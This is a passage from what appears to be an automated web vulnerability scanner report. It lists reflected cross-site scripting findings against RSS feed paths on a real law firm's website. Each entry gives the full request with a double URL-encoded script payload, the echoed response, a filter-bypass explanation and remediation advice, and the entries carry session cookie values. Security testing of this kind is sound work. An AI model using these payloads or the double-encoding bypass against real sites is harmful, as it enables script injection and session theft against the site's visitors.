Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesd46e9"><script>alert(1)</script>f30c22f14ce/International_Trade/rss.xml" value="">
...[SNIP]...

2.196. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/International_Trade/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fca14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea76b08aeebe was submitted in the REST URL parameter 3. This input was echoed as fca14"><script>alert(1)</script>a76b08aeebe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/International_Tradefca14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea76b08aeebe/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/International_Tradefca14"><script>alert(1)</script>a76b08aeebe/rss.xml" value="">
...[SNIP]...

2.197. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/International_Trade/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb24c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6e42435c0a7 was submitted in the REST URL parameter 4. This input was echoed as eb24c"><script>alert(1)</script>6e42435c0a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/International_Trade/rss.xmleb24c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6e42435c0a7 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/International_Trade/rss.xmleb24c"><script>alert(1)</script>6e42435c0a7" value="">
...[SNIP]...

2.198. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Litigation/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4aa15667da1 was submitted in the REST URL parameter 1. This input was echoed as 2cd05"><script>alert(1)</script>4aa15667da1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss2cd05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4aa15667da1/practices/Litigation/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss2cd05"><script>alert(1)</script>4aa15667da1/practices/Litigation/rss.xml" value="">
...[SNIP]...

2.199. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Litigation/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c84a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed9dfe2363ba was submitted in the REST URL parameter 2. This input was echoed as 2c84a"><script>alert(1)</script>d9dfe2363ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices2c84a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed9dfe2363ba/Litigation/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices2c84a"><script>alert(1)</script>d9dfe2363ba/Litigation/rss.xml" value="">
...[SNIP]...

2.200. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Litigation/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 191ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e238461b7a86 was submitted in the REST URL parameter 3. This input was echoed as 191ff"><script>alert(1)</script>238461b7a86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Litigation191ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e238461b7a86/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Litigation191ff"><script>alert(1)</script>238461b7a86/rss.xml" value="">
...[SNIP]...

2.201. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Litigation/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14505%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e478d1333f6d was submitted in the REST URL parameter 4. This input was echoed as 14505"><script>alert(1)</script>478d1333f6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Litigation/rss.xml14505%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e478d1333f6d HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Litigation/rss.xml14505"><script>alert(1)</script>478d1333f6d" value="">
...[SNIP]...

2.202. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Postal/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc84f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e79d0e014d42 was submitted in the REST URL parameter 1. This input was echoed as dc84f"><script>alert(1)</script>79d0e014d42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssdc84f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e79d0e014d42/practices/Postal/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssdc84f"><script>alert(1)</script>79d0e014d42/practices/Postal/rss.xml" value="">
...[SNIP]...

2.203. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Postal/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a669%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6384682ca38 was submitted in the REST URL parameter 2. This input was echoed as 4a669"><script>alert(1)</script>6384682ca38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices4a669%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6384682ca38/Postal/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices4a669"><script>alert(1)</script>6384682ca38/Postal/rss.xml" value="">
...[SNIP]...

2.204. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Postal/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2206f6e398b was submitted in the REST URL parameter 3. This input was echoed as e6c53"><script>alert(1)</script>2206f6e398b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Postale6c53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2206f6e398b/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Postale6c53"><script>alert(1)</script>2206f6e398b/rss.xml" value="">
...[SNIP]...

2.205. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Postal/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a1f6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf2258d21b7 was submitted in the REST URL parameter 4. This input was echoed as 5a1f6"><script>alert(1)</script>af2258d21b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Postal/rss.xml5a1f6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf2258d21b7 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Postal/rss.xml5a1f6"><script>alert(1)</script>af2258d21b7" value="">
...[SNIP]...

2.206. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Privacy/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e69c57b225b was submitted in the REST URL parameter 1. This input was echoed as 35e2f"><script>alert(1)</script>69c57b225b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss35e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e69c57b225b/practices/Privacy/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss35e2f"><script>alert(1)</script>69c57b225b/practices/Privacy/rss.xml" value="">
...[SNIP]...

2.207. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Privacy/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99d2689ecdb was submitted in the REST URL parameter 2. This input was echoed as 38e63"><script>alert(1)</script>99d2689ecdb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices38e63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99d2689ecdb/Privacy/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices38e63"><script>alert(1)</script>99d2689ecdb/Privacy/rss.xml" value="">
...[SNIP]...

2.208. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Privacy/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a06f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eae4d6666dc0 was submitted in the REST URL parameter 3. This input was echoed as 5a06f"><script>alert(1)</script>ae4d6666dc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Privacy5a06f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eae4d6666dc0/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Privacy5a06f"><script>alert(1)</script>ae4d6666dc0/rss.xml" value="">
...[SNIP]...

2.209. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Privacy/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4256c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e823dd7739be was submitted in the REST URL parameter 4. This input was echoed as 4256c"><script>alert(1)</script>823dd7739be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Privacy/rss.xml4256c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e823dd7739be HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Privacy/rss.xml4256c"><script>alert(1)</script>823dd7739be" value="">
...[SNIP]...

2.210. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Professional_Liability/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3058a7872f was submitted in the REST URL parameter 1. This input was echoed as ab6ad"><script>alert(1)</script>3058a7872f in the application's response.

